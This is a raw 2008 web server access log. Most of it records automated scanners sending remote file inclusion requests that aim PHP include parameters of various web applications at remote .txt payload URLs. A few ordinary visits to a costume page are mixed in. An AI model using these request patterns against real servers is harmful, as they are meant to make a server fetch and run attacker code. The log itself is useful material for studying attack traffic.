87.226.77.5 - - [07/Aug/2008:07:16:50 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
85.214.28.190 - - [07/Aug/2008:07:17:15 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
85.214.28.190 - - [07/Aug/2008:07:17:16 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
85.214.28.190 - - [07/Aug/2008:07:17:16 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
77.222.131.35 - - [07/Aug/2008:07:18:59 -0500] "GET /logs//include/write.php?dir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:07:18:59 -0500] "GET //include/write.php?dir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
208.111.154.15 - - [07/Aug/2008:07:19:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.28 - - [07/Aug/2008:07:19:13 -0500] "GET /?D=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
81.198.180.10 - - [07/Aug/2008:07:19:25 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
81.198.180.10 - - [07/Aug/2008:07:19:26 -0500] "GET /phphtml.php?htmlclass_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.198.180.10 - - [07/Aug/2008:07:19:26 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.18.151.242 - - [07/Aug/2008:07:21:39 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:21:39 -0500] "GET /phphtml.php?htmlclass_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:21:39 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
216.206.238.35 - - [07/Aug/2008:07:22:04 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:07:23:24 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:07:23:24 -0500] "GET /phphtml.php?htmlclass_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:07:23:25 -0500] "GET /logs/phphtml.php?htmlclass_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:07:24:11 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:07:24:11 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
58.65.228.5 - - [07/Aug/2008:07:24:14 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
58.65.228.5 - - [07/Aug/2008:07:24:16 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.67.24.222 - - [07/Aug/2008:07:24:29 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:07:24:29 -0500] "GET //index.php?INCLUDE_FOLDER=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
212.92.23.89 - - [07/Aug/2008:07:25:13 -0500] "GET /logs//gallery/errors/needinit.php?GALLERY_BASEDIR=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
216.133.204.228 - - [07/Aug/2008:07:27:19 -0500] "GET /lostpasswd.php?env[include_prefix]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:27:19 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
217.75.193.70 - - [07/Aug/2008:07:27:20 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/poiid.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
217.75.193.70 - - [07/Aug/2008:07:27:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/poiid.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.225.218.2 - - [07/Aug/2008:07:28:05 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:07:28:06 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
193.178.228.12 - - [07/Aug/2008:07:28:14 -0500] "GET /?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
193.178.228.12 - - [07/Aug/2008:07:28:15 -0500] "GET /logs/?mosConfig_absolute_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94311 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
89.171.112.121 - - [07/Aug/2008:07:28:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.171.112.121 - - [07/Aug/2008:07:28:45 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
193.253.223.90 - - [07/Aug/2008:07:28:50 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:07:28:50 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:07:28:52 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:07:28:52 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:07:28:53 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:07:28:54 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:07:28:57 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:07:28:58 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
216.206.238.35 - - [07/Aug/2008:07:31:25 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
67.18.151.242 - - [07/Aug/2008:07:31:31 -0500] "GET /logs/!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:31:31 -0500] "GET /!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:31:32 -0500] "GET /logs/!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:31:32 -0500] "GET /!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
87.253.134.145 - - [07/Aug/2008:07:31:37 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:07:31:38 -0500] "GET //htmltonuke.php?filnavn=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.225.218.2 - - [07/Aug/2008:07:34:50 -0500] "GET /logs/index.php?redir=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:07:34:50 -0500] "GET /index.php?redir=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:35:12 -0500] "GET /!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:36:50 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:36:50 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:36:52 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:36:54 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
59.125.211.84 - - [07/Aug/2008:07:37:01 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
59.125.211.84 - - [07/Aug/2008:07:37:02 -0500] "GET //squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
59.125.211.84 - - [07/Aug/2008:07:37:03 -0500] "GET /logs//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:39:19 -0500] "GET /errors.php?error=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:07:39:38 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
69.93.189.130 - - [07/Aug/2008:07:39:43 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.93.189.130 - - [07/Aug/2008:07:39:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.93.189.130 - - [07/Aug/2008:07:39:43 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
62.119.28.109 - - [07/Aug/2008:07:41:25 -0500] "GET /logs/index.php?redir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.119.28.109 - - [07/Aug/2008:07:41:25 -0500] "GET /index.php?redir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.96.165.19 - - [07/Aug/2008:07:41:38 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.benjaminclayton.co.uk//help01.txt????? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
213.96.165.19 - - [07/Aug/2008:07:41:38 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.benjaminclayton.co.uk//help01.txt????? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
208.100.1.165 - - [07/Aug/2008:07:42:06 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:07:42:06 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
203.98.87.14 - - [07/Aug/2008:07:42:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:07:42:30 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.79.163.142 - - [07/Aug/2008:07:43:14 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
66.79.163.142 - - [07/Aug/2008:07:43:15 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
208.100.1.165 - - [07/Aug/2008:07:43:37 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:07:43:37 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
205.234.161.171 - - [07/Aug/2008:07:43:41 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.161.171 - - [07/Aug/2008:07:43:41 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
205.234.161.171 - - [07/Aug/2008:07:43:41 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.161.171 - - [07/Aug/2008:07:43:41 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:07:44:10 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:07:44:10 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.34.175.15 - - [07/Aug/2008:07:44:16 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
67.18.151.242 - - [07/Aug/2008:07:44:41 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.199.244.42 - - [07/Aug/2008:07:44:45 -0500] "GET /amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 329 "-""Advanced Browser (http://www.avantbrowser.com)"
66.199.244.42 - - [07/Aug/2008:07:44:55 -0500] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 334 "-""Advanced Browser (http://www.avantbrowser.com)"
67.18.151.242 - - [07/Aug/2008:07:45:59 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:07:45:59 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
212.97.132.101 - - [07/Aug/2008:07:46:30 -0500] "GET /logs/errors.php?error=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:07:46:30 -0500] "GET /logs/errors.php?error=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:07:46:30 -0500] "GET /errors.php?error=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:07:46:30 -0500] "GET /errors.php?error=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
66.199.244.42 - - [07/Aug/2008:07:47:00 -0500] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 330 "-""Advanced Browser (http://www.avantbrowser.com)"
212.97.132.101 - - [07/Aug/2008:07:47:14 -0500] "GET /errors.php?error=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
72.248.189.215 - - [07/Aug/2008:07:47:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:07:47:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
212.97.132.101 - - [07/Aug/2008:07:48:08 -0500] "GET ///vwar/backup/errors.php?error=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 296 "-""libwww-perl/5.53"
59.188.5.164 - - [07/Aug/2008:07:49:16 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.812"
59.188.5.164 - - [07/Aug/2008:07:49:16 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
59.188.5.164 - - [07/Aug/2008:07:49:17 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
77.222.131.35 - - [07/Aug/2008:07:53:29 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:07:53:29 -0500] "GET //include/write.php?dir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.222.131.35 - - [07/Aug/2008:07:53:30 -0500] "GET /logs//include/write.php?dir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
72.248.189.215 - - [07/Aug/2008:07:53:33 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.206.238.35 - - [07/Aug/2008:07:55:21 -0500] "GET /logs/access_log.1214438400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:07:55:21 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:07:55:21 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
203.98.87.14 - - [07/Aug/2008:07:56:02 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
77.90.20.2 - - [07/Aug/2008:07:57:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 307 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:07:57:14 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 329 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:07:57:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 302 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:07:58:39 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:07:58:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:07:58:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
60.48.241.227 - - [07/Aug/2008:07:59:38 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costumes""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:07:59:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:07:59:56 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:07:59:57 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:07:59:58 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:07:59:58 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
85.214.78.119 - - [07/Aug/2008:08:00:03 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.214.78.119 - - [07/Aug/2008:08:00:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
60.48.241.227 - - [07/Aug/2008:08:00:05 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:00:17 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
200.34.175.15 - - [07/Aug/2008:08:02:11 -0500] "GET //vwar/backup/errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
67.18.151.242 - - [07/Aug/2008:08:02:18 -0500] "GET /logs/access_log.1212883200/!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:02:18 -0500] "GET /!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:02:18 -0500] "GET /logs/!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
